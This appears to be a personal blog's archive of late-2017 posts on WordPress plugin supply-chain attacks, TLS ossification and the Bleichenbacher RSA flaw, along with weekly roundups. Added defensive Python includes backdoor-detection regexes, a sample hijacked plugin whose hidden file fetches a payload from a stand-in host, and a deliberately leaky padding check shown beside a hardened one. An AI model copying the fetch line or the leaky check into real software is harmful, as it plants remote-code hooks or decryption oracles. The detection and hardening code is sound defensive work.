Categories
Links Writing

WordPress Supply Chain Attacks

Per Wordfence there are four reasons for supply-chain (i.e. plugin-based) attacks on WordPress installations:

The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.

Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.

Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.

Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er-do-wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.

The aforementioned points outline why acquiring and infecting WordPress plugins is a reasonable way of penetrating WordPress installs. However, I think that Wordfence is missing the most important reason that such attacks succeed: few actual users of WordPress are technically competent to monitor what, exactly, their plugins are doing. Nor are the shared hosting services particularly good at identifying and alerting technically illiterate users that their sites are compromised, or at telling site owners what they need to do to remediate the intrusion.

Trying to get individual users to more carefully monitor how their plugins work is a fool’s errand. What’s needed is for hosts to provide a community service and actively not just identify hijacked plugins (and sites) but, also, provide meaningful remediation processes. User education and alerts aren’t enough (or even moderately sufficient): companies must guide site owners through the process of cleaning their sites. Otherwise malware campaigns aimed at WordPress will persist and grow over time.
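One concrete form that host-side identification could take (an added example written for this page, not Wordfence’s or WordPress.org’s tooling): compare each installed plugin’s files against the hashes of the official release for that version, and scan only the files that differ for indicators of injected code. The baseline manifest is assumed to be computed by the host from the release zip; the indicator patterns and the sample plugin are constructed for the example.

```python
"""Host-side integrity and indicator check for an installed WordPress plugin.

Added example, not Wordfence or WordPress.org tooling. It assumes the host has
a baseline manifest (relative path -> SHA-256) computed from the official
release zip for the installed version; anything that does not match that
release byte-for-byte is reported, and only those files are scanned for
indicators, so an obfuscated but unmodified upstream file does not raise noise."""
import hashlib
import os
import re

# Constructed indicator list: common in injected backdoors, not exhaustive, and
# bound to hit some legitimate obfuscated code, which is why it is only applied
# to files that already differ from the release.
INDICATORS = {
    "eval of decoded blob": re.compile(
        rb"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "remote fetch": re.compile(
        rb"\b(?:file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "long hex-escaped string": re.compile(rb"(?:\\x[0-9a-f]{2}){8,}", re.I),
    "create_function": re.compile(rb"\bcreate_function\s*\(", re.I),
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(files):
    """{relative path: bytes} -> {relative path: sha256 hex}."""
    return {path: sha256_hex(data) for path, data in files.items()}


def load_plugin_dir(root):
    """Read a plugin directory from disk into {relative path: bytes}."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                files[rel] = fh.read()
    return files


def scan_indicators(data):
    return [label for label, pattern in INDICATORS.items() if pattern.search(data)]


def audit_plugin(installed, baseline):
    """Diff the installed tree against the baseline manifest, then scan every
    added or modified file. Returns a report a host could turn into an
    actionable notice: which files changed, and why they look suspicious."""
    report = {"modified": [], "added": [], "missing": [], "indicators": {}}
    for path in sorted(installed):
        data = installed[path]
        expected = baseline.get(path)
        if expected is None:
            report["added"].append(path)
        elif sha256_hex(data) != expected:
            report["modified"].append(path)
        else:
            continue  # identical to the official release: trusted
        hits = scan_indicators(data)
        if hits:
            report["indicators"][path] = hits
    report["missing"] = sorted(set(baseline) - set(installed))
    report["clean"] = not (report["modified"] or report["added"] or report["missing"])
    return report


# Constructed sample: a two-file release, and the same plugin after a hijack
# appended a loader to the main file and dropped a hidden fetcher.
CLEAN_RELEASE = {
    "hello-widget/hello-widget.php": (
        b"<?php\n/* Plugin Name: Hello Widget */\n"
        b"add_action('init', 'hw_init');\nfunction hw_init() {}\n"),
    "hello-widget/readme.txt": b"=== Hello Widget ===\nStable tag: 1.0\n",
}
HIJACKED_INSTALL = dict(CLEAN_RELEASE)
HIJACKED_INSTALL["hello-widget/hello-widget.php"] += (
    b"eval(base64_decode('aGVsbG8='));  // placeholder blob, decodes to 'hello'\n")
HIJACKED_INSTALL["hello-widget/inc/.cache.php"] = (
    b"<?php echo file_get_contents('http://example.invalid/payload.txt');\n")

if __name__ == "__main__":
    baseline = build_manifest(CLEAN_RELEASE)
    for path, hits in audit_plugin(HIJACKED_INSTALL, baseline)["indicators"].items():
        print(path, "->", ", ".join(hits))
```

The hash comparison does the real work; the indicator scan only explains what changed in terms a site owner can act on. Running it from a host’s side of the filesystem means the check does not depend on the compromised site’s own PHP being trustworthy.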

Categories
Roundup Writing

The Roundup for December 23-29, 2017 Edition

Bright Fathers by Christopher Parsons

It’s the time of year when people reflect on past annual resolutions while beginning to think about what resolutions they’ll ‘commit’ to in the coming year. I enjoy the idea of establishing annual targets and goals. Not just because it’s fun to imagine how great life would be if you hit them all, but because it provides an ongoing sense of direction in what is often a rote world. More than that, resolutions, goal setting, or whatever else you call it are helpful for providing a lens through which to reflect on a year gone by.

I had one standard resolution, which I absolutely failed to make possible, and a host of them that were far more successful. I fully exited consumer debt hell, increased monthly student loan payments, photographically documented many of the major events in my life, dealt with the last administrative aspects of my last relationship, and mostly righted my financial ship. All of those were major life accomplishments and have done things like change how I visually see the world every day, how I experience my relationships with money, and how I approach my relationships today. It’s not just that I finished something but that in the course of undertaking a series of activities I’ve opened up entirely new (and, arguably, healthier) ways of seeing the world.

But there were other things that I accomplished that I think are as important as those goals that were set last year. I think I’m most proud of the fact that I can see ways in which I’ve grown emotionally. Specifically, in my desire to avoid some of the mistakes of my last relationship I’ve had honest and oftentimes painful conversations that were based on what I believe to be right for me; rather than subsuming myself to make life easier I’ve just been me, even when doing so might cause challenges in my relationships. Such challenges, however, are healthy insofar as strong areas of disagreement aren’t indications of a lack of love but, instead, of a healthy set of egos that simply must come to a consensual agreement on how to proceed. Learning how to love in a healthy way has been scary while also amplifying my ability to be present and with others in ways I never understood as possible.

I’ve also managed to overcome some long held fears that were the result of bullying I experienced while growing up. The result is that I can make healthy choices for my body without having a voice in the back of my head that sabotages my efforts to be fitter, eat better, and be happier in my own body. Getting over those particular demons is especially important, in my situation, given that I’m creeping up on the age when coronary diseases start to take the lives of the men in my family.

In the coming days I’ll be thinking through the kinds of resolutions and thematics that I want to carry forward into the coming year. Centrally, I think I’m going to have ‘testable’ objectives, insofar as I’ll be able to actually measure whether or not I’ve advanced in some of the hobbies that I’m involved in, while also trying to find ways of deprioritizing activities that are pleasurable but don’t really do much to advance my physical, intellectual, artistic, professional, or emotional wellbeing.


I spent a significant amount of time thinking about the implications of path dependency in socio-technical systems over the course of my doctoral degree. For my work, I hypothesized that similar kinds of technologies in a path-dependent system would unfold in similar ways cross-jurisdictionally. This common unfolding would take place because once technological development began down a particular path, other paths would be foreclosed and a common end would be reached regardless of regulation, policy, or law.

In the work I did, this dependency wasn’t actually evidenced with much regularity. But some of that was because the technologies I was looking at were heavily socialized: they were used for a range of different tasks and, as such, their development impetuses were often decidedly non-technical. In contrast, the development of Transport Layer Security (TLS) has a kind of path dependency that is notably challenging to deviate from, not just because clients and servers must implement new versions of the protocol but because developers of middleboxes simply assume technology will unfold in a given way and have developed their own technologies based on those assumptions. In reaction, the Internet community has spent a considerable amount of time trying to ameliorate the difficulties that arise when implementing new versions of the protocol, difficulties linked to assumptions as to how the protocol would, and will, develop.

Cryptographers are increasingly talking about the problems associated with adopting new versions of TLS as ‘joints’ ‘rusting shut.’ As discussed by Cloudflare, in the context of middleboxes:

Some features of TLS that were changed in TLS 1.3 were merely cosmetic. Things like the ChangeCipherSpec, session_id, and compression fields that were part of the protocol since SSLv3 were removed. These fields turned out to be considered essential features of TLS to some of these middleboxes, and removing them caused connection failures to skyrocket.

If a protocol is in use for a long enough time with a similar enough format, people building tools around that protocol will make assumptions around that format being constant. This is often not an intentional choice by developers, but an unintended consequence of how a protocol is used in practice. Developers of network devices may not understand every protocol used on the internet, so they often test against what they see on the network. If a part of a protocol that is supposed to be flexible never changes in practice, someone will assume it is a constant. This is more likely the more implementations are created.

It would be disingenuous to put all of the blame for this on the specific implementers of these middleboxes. Yes, they created faulty implementations of TLS, but another way to think about it is that the original design of TLS lent itself to this type of failure. Implementers implement to the reality of the protocol, not the intention of the protocol’s designer or the text of the specification. In complex ecosystems with multiple implementers, unused joints rust shut.

To some extent, the lesson to be taken from the efforts to update to TLS 1.3 is to have protocols which are simpler in nature and with fewer moving parts.1 Another lesson is that it takes years to actually shift the global population of Internet devices en masse to more secure ways of communicating. But perhaps the most fundamental lesson — to my mind — is that the security of the Internet is still trying to mediate and resolve problems which were initially seeded many, many years ago, and which may mean it takes up to a decade to fix the problems specific to TLS 1.2.

Built infrastructure such as middleboxes isn’t updated on a regular basis because the infrastructure represents a capital cost. And so even as new protocols struggle to come to terms with the past, they do so by conforming to the paths set down by previously deployed protocols. Even as TLS 1.3 is deployed and made usable, it will be done so based on how earlier versions of the protocol were designed and then implemented. So the questions that linger include: how will implementers of TLS 1.3 make decisions, and how will their decisions direct the development and implementation of future versions of TLS? In effect: how much will the paths of the past continue to affect how future versions of TLS can be practically — as opposed to hypothetically — developed?
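As an added illustration of the ‘rusting shut’ problem and the GREASE remedy described in footnote 1 (example code written for this post, not Cloudflare’s or any TLS library’s), the block below encodes two ClientHello vectors with a random RFC 8701 GREASE value in front, then parses them twice: once as a conforming peer that ignores values it does not recognise, and once as a middlebox that treats its own table of previously seen values as the protocol. The cipher-suite and version tables are constructed stand-ins for the IANA registries.

```python
"""GREASE for TLS code points (RFC 8701), as an added illustration.

A client sprinkles reserved, meaningless values into the cipher_suites and
supported_versions vectors. A peer that follows the specification ignores
values it does not recognise and negotiates normally; a middlebox whose parser
has 'rusted shut' around the values it has seen in the wild fails now, on every
connection, instead of years later when a real new version appears."""
import secrets
import struct

# The 16 reserved GREASE values: 0x0a0a, 0x1a1a, ..., 0xfafa.
GREASE_VALUES = [(hi << 8) | hi for hi in range(0x0A, 0x100, 0x10)]

# Constructed registries standing in for the IANA cipher-suite and version tables.
KNOWN_SUITES = {
    0x1301: "TLS_AES_128_GCM_SHA256",
    0x1302: "TLS_AES_256_GCM_SHA384",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
}
KNOWN_VERSIONS = {0x0303: "TLS 1.2", 0x0304: "TLS 1.3"}


def is_grease(value):
    return value in GREASE_VALUES


def encode_vector(values, length_size, grease=True):
    """Encode a TLS <length><uint16...> vector. cipher_suites uses a 2-byte
    length, supported_versions a 1-byte length. With grease=True a random GREASE
    value is placed first, as Chrome does for these two fields."""
    values = list(values)
    if grease:
        values.insert(0, secrets.choice(GREASE_VALUES))
    body = b"".join(struct.pack("!H", v) for v in values)
    return len(body).to_bytes(length_size, "big") + body


def decode_vector(buf, length_size):
    """Inverse of encode_vector; raises on a truncated or odd-length body."""
    n = int.from_bytes(buf[:length_size], "big")
    body = buf[length_size:length_size + n]
    if len(body) != n or n % 2:
        raise ValueError("malformed vector")
    return [struct.unpack("!H", body[i:i + 2])[0] for i in range(0, n, 2)]


def select(offered, known, strict):
    """Pick the first offered value the receiver supports.

    strict=False is what TLS requires of a conforming peer: skip unknown values.
    strict=True models a rusted-shut middlebox that treats any value outside its
    table as a protocol error, which is exactly the failure GREASE provokes."""
    for value in offered:
        if value in known:
            return known[value]
        if strict:
            raise ValueError("unknown code point 0x%04x" % value)
    raise ValueError("no value in common")


def negotiate(client_hello_suites, client_hello_versions, strict):
    """Run both selections over encoded vectors and report the outcome the
    client would see: a negotiated pair or a connection failure."""
    try:
        suite = select(decode_vector(client_hello_suites, 2), KNOWN_SUITES, strict)
        version = select(decode_vector(client_hello_versions, 1), KNOWN_VERSIONS, strict)
        return ("ok", version, suite)
    except ValueError as err:
        return ("failed", str(err))


if __name__ == "__main__":
    suites = encode_vector([0x1302, 0x1301, 0xC02F], 2)
    versions = encode_vector([0x0304, 0x0303], 1)
    print("conforming peer:", negotiate(suites, versions, strict=False))
    print("rusted middlebox:", negotiate(suites, versions, strict=True))
```

The point of the exercise is the asymmetry: the conforming path is unaffected by the random value, while the strict path breaks on the very first connection. Because the GREASE value changes from connection to connection, a middlebox cannot quietly hard-code it either, which is what keeps the joint oiled.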


Inspirational Quotation

“Generosity is the most natural outward expression of an inner attitude of compassion and loving-kindness.”

– Dalai Lama

Great Photography Shots

I’ve really fallen in love with some of the shots which were submitted to this year’s Sony World Photography Awards.

The Horns at sunrise. © Vincent Chen, China, Entry, Open, Landscape & Nature (2018 Open competition), 2018 Sony World Photography Awards.
Little Indian. © Virgilio Liberato, Philippines, Entry, Open, Portraiture (Open competition), 2018 Sony World Photography Awards.
Lunch Break. © Omer Faidi, Turkey, Entry, Open, Street Photography (Open competition), 2018 Sony World Photography Awards.

Intriguing Video Art

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Product Advice

  1. Per Cloudflare: David Benjamin proposed a way to keep the most important joints in TLS oiled. His GREASE proposal for TLS is designed to throw in random values where a protocol should be tolerant of new values. If popular implementations intersperse unknown ciphers, extensions and versions in real-world deployments, then implementers will be forced to handle them correctly. GREASE is like WD-40 for the Internet.
Categories
Links Writing

The Dangers of Policy Learning

Via the New York Times:

Seizing on immigration as the cause of countless social and economic problems, Mr. Trump entered office with an agenda of symbolic but incompletely thought-out goals, the product not of rigorous policy debate but of emotionally charged personal interactions and an instinct for tapping into the nativist views of white working-class Americans.

Donald Trump isn’t so much tapping into ‘nativist’ views as, instead, exploiting citizens’ unawareness of the benefits of both immigration and trade. Immigrants contribute to the tax base, take less time off, and their direct descendants also contribute more to the tax base than ‘long-term’ citizens. Immigration is a net gain for ‘regular’ American workers but they haven’t been told just how, and why, their own lives and the social benefits they draw on are significantly improved by immigration into America.

Even as the administration was engaged in a court battle over the travel ban, it began to turn its attention to another way of tightening the border — by limiting the number of refugees admitted each year to the United States. And if there was one “deep state” stronghold of Obama holdovers that Mr. Trump and his allies suspected of undermining them on immigration, it was the State Department, which administers the refugee program.

The State Department is a core centre of American soft power; its programs, educational efforts, international outreach, and more are responsible for spreading American values around the world.1 That the administration is hollowing out the department is the truest evidence that the Trump administration is unaware of how, and why, America has managed to maintain its position in the world. While American military might is significantly responsible for the development and maintenance of its imperial stature in the world, this stature is solidified and extended through an adoption of American values. Such values are more than those associated with the military; they’re linked with those spread by staff from State who promote American values in more formal diplomatic efforts as well as the other range of activities undertaken by consular and embassy staff throughout the world.

It is incredibly hard to believe that the Trump administration is barely one year into a four-year term. Given the lasting damage the administration has already done to America’s ability to project power around the world, it’s hard to imagine just what America’s stature will be in a few more years. But what’s most significant is that his administration has learned so quickly how to engage in the deliberate hollowing out of the institutions which have long been hallowed to Americans. This kind of learning is indicative that the administration might be successful on more of its more outrageous campaign promises, promises which are being supported by both houses of Congress, and thus indicative of a broader series of values (or lack thereof) which are held by many American politicians.

  1. In the interest of disclosure: I will personally be enrolled in the State Department’s International Visitor Leadership Program in the coming fall.
Categories
Links Roundup Writing

The Roundup for December 16-22, 2017 Edition

Picture of an illuminated maple leaf
Canadian Heart by Christopher Parsons 

My less-busy times this week were spent writing out notes, cards, emails, and other correspondence to some of the most important people in my life. It’s been a challenging year; the world seems to be falling apart due to changes in American politics, deaths and illnesses by family and friends have been hard to take, and the tempo for high-quality professional work never really slows down. And so I took some time writing to the people I’ve most closely worked with, supported, or been supported by to thank them for just being present and active in my life.

I find writing these sorts of messages of thanks, encouragement, and praise challenging. They’re not the kind of thing that I have ever really received much of throughout my personal or professional life; it’s just not normal in my family to communicate our deep feelings for one another, and in academe the point is to move to the next project (and subject it to critique) instead of dwelling on past projects and receiving accolades for them. But as challenging as I find writing these messages they have a profound personal impact: by pulling together my thoughts and writing them down and sending them, I’m humbled by realizing just how blessed I am to be surrounded by the kind, funny, supporting, and amazing people in my life.

There used to be a time when a lot more holiday cards, notes, and messages were sent back and forth between people this time of year. And many people still send cards, but don’t take the time — five, ten, or even twenty minutes — to handwrite a real thought to whomever the recipient happens to be. But those are the cards and notes and emails that people carry with them for years, packing them carefully away as they move from one physical or digital home to another. They don’t cost a lot of money to produce, and in the case of email are almost entirely free, but they show that you’ve spent time thinking about a specific person. And that time, in and of itself, is indicative of someone’s importance in your life.

So before you go out and spend money on another present consider taking that time and, instead, writing a letter or note to whomever the recipient is. Chances are good that they’ll remember and treasure the message you left with them for longer than any material possession you might give them.


Some of the bigger news in the Apple world, this week, has focused on changes to how Apple treats older iPhones which are suffering battery degradation. While the majority of the reporting is focused on how iPhone 6 and 6s devices are experiencing slowdowns — which is the change Apple has imposed as of iOS version 11.2.0 — iPhone 7 devices are also exhibiting the slowdowns as they suffer battery degradation.

I’m of mixed minds on this. I see this as an effort by Apple to avoid having to replace batteries on older (but not THAT old) devices but in a sneaky way: the company’s lack of transparency means that it appears that Apple is trying to pull a fast one on consumers. This is especially the case for those consumers who’ve purchased AppleCare; if their devices are suffering known problems, then Apple should at the minimum be notifying owners to bring the devices in for servicing on a very proactive basis, and that doesn’t seem to have been the case.

So, on the one hand, this is Apple being sneaky.

But on the other it’s a semi-elegant engineering problem to resolve a hard-to-fix problem. We use our smartphones with such regularity and subject them (and, in particular, their batteries) to such exceptional abuse that degradation has to happen. And so I think that Apple stuffing processors into devices (at least in the current and last generation) that are excessive for daily use means the slowdowns are less problematic for most users. They might think that their devices are a bit slower but, generally, still be able to use them for about as long as they used to use them. And that length of use is what most people measure ‘battery life’ by so…maybe Apple is dealing with the problem the way users would actually prefer.

That Apple doesn’t change out batteries when they’re worn down, however, emphasizes that it’s a pretty good idea to resell your devices every year or so in order to get the best return for them as well as in order to enjoy the best performance from your iPhone. And I guess, as a byproduct, if you’re buying a second-hand iPhone you should definitely do a battery test before handing over your cash.


Inspiring Quotation

“Giving is about more than donating money. It’s about sharing your capabilities, content, and connections—and above all, giving others the chance to be heard, respected, and valued.”

– Adam Grant

Great Photography Shots

I’m absolutely blown away by the award winning photos for the 2017 Siena International Photo Awards.

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Products

Categories
Roundup Writing

The Roundup – December 9-15, 2017 Edition

Winter Boardwalk by Christopher Parsons 

I have a whole host of things that I need to do in order to keep a chronic (very non-life threatening!) health condition at bay. Part of that is maintaining a pretty strict work-life balance. When I was doing my doctorate I absolutely failed to conceptualize, let alone maintain, a real balance and as a result I suffered from a pretty problematic health condition for years and years. And because I didn’t have work-life balance (and ignored advice from those who maintained such a balance) a lot of unpleasant things happened in my life that didn’t necessarily have to and I prioritized the wrong things as being of importance.

I mismanaged relationships. I failed to take advantage of living in one of the most beautiful cities in Canada, if not the world. I didn’t develop, let alone maintain, many friendships at a time where I probably most needed them.

And in reaction to how my life didn’t work during that time, and with the privilege of having a full-time job where I’m not expected to be constantly on the clock, I’ve worked to maintain a balance in my professional and personal activities. The medical result has been that the condition I deal with has become an occasional inconvenience instead of a serious issue in daily life.

This week my carefully maintained work-life balance entirely fell apart. It’s still apart, right now, and that condition is on top of me once again. I cannot wait until the holiday break and the chance to hit the reset button and return to balance. I can only hope that things haven’t gotten bad enough to need to return to visiting my doctors…


A few weeks ago, Ming Thein wrote about the relative importance of the shooting experience that you have with your camera of choice. One of the key things he mentioned was:

… if a camera does not enable us to either translate an idea, preserve a moment or present something otherwise unseen: it isn’t very useful as a tool, no matter how pretty or expensive or high-resolving it might be.

This point really resonated with me. It brought me back to when I was trying to decide which mirrorless camera to purchase. I’d been using (and still do use!) a Sony RX100ii and, temporarily, a Fuji X100. I loved the Fuji but I couldn’t really explain why until after I’d relied almost entirely on the RX100ii for a full year.

While in part I missed the viewfinder, what I was really missing was the ability to rapidly change settings to get the shot that I wanted and, also, to learn what I had to do, to get the shot I wanted. Let me explain.

The Sony is a great little camera. I’ve taken photos with it that I’ve gotten blown up to be pretty large (36 inches by 24 inches) and which now hang on my walls. I have a series of photos I took while in Iceland, Hong Kong, Australia, and other places that I absolutely love. But the shooting experience has always been subpar. The inability to just turn this knob or that one to get exactly what I want, in a second or two, means that shooting with the Sony is often really frustrating. If I can plan a shot it’s great. If it’s in the moment? The shot is missed more than caught.

So when I was looking at different mirrorless cameras to purchase and supplement the RX100ii I was drawn to the Sony a6100, which had amazing specifications. But when I actually held and touched and shot with it I just wasn’t taken by it. It’s an amazing camera but just felt cold. The Fuji line was pretty great – I really wanted to get an X-T10! – but I found the glass to be expensive, especially when I started thinking about buying image stabilized lenses.

So I ended up getting an Olympus EM10ii, instead, and was initially sorta scared of it. There were a lot of knobs to turn and, while I wanted that, it was also intimidating. But as I’ve used the Olympus I’ve come to realize that it is definitely the right camera for me, now. It’s light enough and small enough that I almost always have it with me. It performs pretty well with prime lenses in mixed settings. And while I can lust over other mirrorless systems when they come out I don’t see anything that they do which I absolutely need given my abilities, shooting preferences, and devotion to the hobby right now.

Most importantly, the Olympus feels right in my hands. I’ve used it enough that I’m comfortable with most of the settings that I use1 while it still provides me with a lot of room to learn and grow. I’m pretty comfortable with my 50mm equivalent lens after exclusively shooting with it for several months straight, and reasonably comfortable with the 35mm equivalent that I use.2 In terms of the shooting experience the EM10ii is pretty great for someone who is interested in photography but certainly never expects to do much more than travel the world, shoot, and then make prints for personal or family use. I know it’s not the ‘best’ camera out there but, for me, the shooting experience is pretty close to perfect.


Great Photography Shots

I’m absolutely entranced by the photos that South African photographer and visual artist, Elsa Bleda, has taken which emphasize the dream-like fluorescent glow from neon signs and lights. Breathtaking.

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Products

  1. Of course, the camera is super capable at doing lots of things I’m not interested in doing. And as someone who doesn’t ever shoot video the relative limitations of the Olympus camera system over that of either Sony or Panasonic doesn’t bother me.
  2. Perhaps curiously I’m the least comfortable using the kit zoom lens that came with the camera!
Categories
Links Writing

19 Year-Old Vulnerability Continues to Haunt the Internet

Via Ars Technica:

A surprisingly big number of top-name websites—Facebook and PayPal among them—recently tested positive for a critical, 19-year-old vulnerability that allowed attackers to decrypt encrypted data and sign communications using the sites’ secret encryption key.

The vulnerability in the transport layer security protocol for Web encryption was disclosed in 1998 when researcher Daniel Bleichenbacher found it in the TLS predecessor known as secure sockets layer. A flaw in the algorithm that handles RSA encryption keys responded to certain types of errors in a way that divulged potentially sensitive information. With enough specially formed queries, attackers could exploit the weakness in a way that allowed them to decrypt ciphertext even when they didn’t have the secret decryption key. SSL architects responded by designing workarounds that suppressed the error messages rather than removing or rewriting the faulty RSA algorithm.

The vulnerability of Cisco’s ACE is concerning, because Cisco stopped supporting it several years ago and the researchers said the company has no plans to patch the product line. Even worse, it’s not possible to disable RSA encryption in the product, leaving users unable to follow one of the few possible workarounds for those unable to patch. What’s more, the researchers said Cisco is currently using ACE to serve content on cisco.com.
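To make the workaround concrete (an added example, not from the Ars piece or any particular TLS implementation): the block below takes an RSA-decrypted PKCS#1 v1.5 block, as a TLS server sees it before extracting the premaster secret, and checks it two ways. The first stops at the first failure and reports a distinct reason, which is the error oracle the article describes; the second, following the approach RFC 5246 section 7.4.7.1 prescribes, runs every check and substitutes a random premaster secret on any failure so the server’s visible reaction is the same for good and bad blocks. No RSA key is involved; the padding helper exists only to construct inputs, and the 128-byte block size is an assumption.

```python
"""PKCS#1 v1.5 premaster-secret handling: the leaky check beside the hardened
one. Added example; it works on the already RSA-decrypted block so no key is
needed. The leaky version reports a different outcome per failure, which is
the oracle; the hardened one (the approach RFC 5246 section 7.4.7.1 takes)
never reports a padding failure at all."""
import secrets

PMS_LEN = 48  # TLS premaster secret: 2 version bytes + 46 random bytes


def pkcs1_v15_pad(pms, k):
    """Encode pms as a type-2 block of k bytes: 00 02 <nonzero padding> 00 <pms>.
    Constructed here only to produce inputs for the checks below."""
    ps_len = k - 3 - len(pms)
    if ps_len < 8:
        raise ValueError("modulus too small")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(ps_len))
    return b"\x00\x02" + ps + b"\x00" + pms


def unpad_leaky(block, client_version):
    """Return the premaster secret or raise with a reason-specific message.
    Each distinct reason (and the point at which the function stops) is
    observable behaviour that an attacker submitting chosen ciphertexts can
    use to learn about the plaintext."""
    if len(block) < 11 or block[0] != 0x00 or block[1] != 0x02:
        raise ValueError("bad block type")
    sep = block.find(b"\x00", 2)
    if sep < 0:
        raise ValueError("no separator")
    if sep < 10:
        raise ValueError("padding too short")
    pms = block[sep + 1:]
    if len(pms) != PMS_LEN:
        raise ValueError("bad premaster length")
    if pms[:2] != client_version:
        raise ValueError("version mismatch")
    return pms


def unpad_hardened(block, client_version):
    """Always return 48 bytes. Every check runs, the separator is looked for at
    the one position a correct block can have it, and on any failure a random
    secret is substituted without branching, so the handshake later fails in
    Finished with a generic alert whatever the reason. Python itself is not
    constant-time; the structure, not the timing, is the point."""
    random_pms = secrets.token_bytes(PMS_LEN)
    n = len(block)
    # n is the modulus length, public information, so this early return leaks nothing.
    if n < 11 + PMS_LEN:
        return random_pms
    sep = n - PMS_LEN - 1
    good = int(block[0] == 0x00) & int(block[1] == 0x02)
    for i in range(2, sep):
        good &= int(block[i] != 0x00)
    good &= int(block[sep] == 0x00)
    pms = block[sep + 1:]
    good &= int(pms[0] == client_version[0]) & int(pms[1] == client_version[1])
    mask = -good & 0xFF  # 0xFF when every check passed, else 0x00
    return bytes((p & mask) | (r & (mask ^ 0xFF)) for p, r in zip(pms, random_pms))


def observe(unpad, block, client_version=b"\x03\x03"):
    """What an attacker who can watch the server's reaction records."""
    try:
        unpad(block, client_version)
        return "accepted"
    except ValueError as err:
        return "rejected: " + str(err)


if __name__ == "__main__":
    k = 128  # a 1024-bit modulus, small for illustration
    good = pkcs1_v15_pad(b"\x03\x03" + secrets.token_bytes(46), k)
    probes = {
        "valid block": good,
        "wrong type byte": b"\x00\x01" + good[2:],
        "no separator": b"\x00\x02" + b"\x01" * (k - 2),
        "short padding": b"\x00\x02" + b"\x01" * 5 + b"\x00" + good[-PMS_LEN:],
    }
    for name, blk in probes.items():
        print("%-16s leaky=%-28s hardened=%s" % (
            name, observe(unpad_leaky, blk), observe(unpad_hardened, blk)))
```

Run stand-alone, the leaky column shows four different outcomes and the hardened column shows one. That single outcome is the whole countermeasure: the attacker’s chosen ciphertexts still get decrypted, but nothing about the result reaches them, which is why suppressing the distinction (rather than replacing the padding scheme) was enough to close the 1998 attack and why any implementation that reintroduces a distinction, whether in an alert, a timing difference or a dropped connection, reopens it.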

Companies that are responsible for providing critical infrastructure technologies need to be accountable for what they develop and sell. Imagine if a car company with a known-deficient vehicle refused to fix or repair it on the basis they didn’t support it any longer – there’d be class action suits almost immediately. The technology sector needs to mature, and fast.

But as an aside, these are the sorts of weaknesses and vulnerabilities that the NSA and other national security agencies, along with private signals intelligence vendors, actively exploit. The actual ways in which cryptography is implemented are often rife with issues. One has to ask why Cisco and other major companies’ products were vulnerable in the first place but, also, whether the NSA or its sister agencies knew about the weaknesses and have been exploiting them instead of trying to better secure the public’s communications.

In theory the United States of America’s government, as well as the Canadian government, has a Vulnerabilities Equities Process (VEP). If this vulnerability was discovered but not disclosed it would be a damning indictment of the adequacy of the current VEP protocols.

Categories
Roundup Writing

The Roundup for December 2-8, 2017 Edition

It feels like everyone I know has led a more stressful life this year. Beyond the chaos wrought on the global psyche by the American president, there have also been more deaths, serious illnesses, job losses, and emotional meltdowns than normal. In my own case, the death of two parents and ongoing revelations of sexual assaults and abuses near to my life have been incredibly challenging issues to deal with.

So it was with great interest that I read a piece by Ankita Rao on how she has turned dealing with her personal stress into a kind of science experiment. The tests and activities she points to reveal the number of factors in our lives that amplify underlying stress levels as well as the means we can use to reduce stress in our personal lives. I’ve made a commitment since mid-2017 to actively, and assertively, maintain a particular work-life balance. That involves taking on consulting clients only when the monetary outcome is necessary to address particular fiscal stresses (see: student loans) and ensuring that I actually spend time working out, taking photowalks, and letting myself engage in non-productive play.

I haven’t always been successful. But on the whole I’m exercising a lot more, have taken photos I’m incredibly happy with, and am overcoming a longstanding guilt that playing games is somehow undermining my productivity. I have a long ways to go to ensure the balance I’m trying to achieve is a permanent feature of my life but I feel like habits are starting to settle in, and my overall stress levels declining as a result.


Just prior to Netflix’s release of The Punisher some critics argued that the show had an opportunity to — and failed to — respond to the tragedy of gun violence in the United States. I haven’t quite finished the series but I tend to agree that the show is definitely not directly addressing that issue.

But the show isn’t about gun violence. It’s about what losing family means and drives someone (read: white males) to do. It’s about the problems linked to how soldiers of all stripes are asked to endure physical and mental hardships and then return home without society acknowledging their sacrifices or providing support for their wounds. Or about how even when support is provided that there is no guarantee that those broken humans will ever be whole again. The show is about how fraught relationships become when we are separated from those we relate to, either by distance, by death, or by betrayal. Throughout the episodes I’ve watched a repeated motif, which does pertain to gun violence, is how firearms can prompt the aforementioned hardships, either by killing in the name of one’s country or in the name of one’s personal ideology or simply by accident when weapons are nearby.


I entered the workforce ‘late’ in terms of my ability to save for retirement. Since I went to school until my early 30s, and lived paycheque to paycheque to try and stay afloat, and have loan obligations, it’s not going to be until my late 30s or early 40s when I can ‘really’ save for my retirement. And that assumes that I save for retirement instead of for a home or condo that I own.1

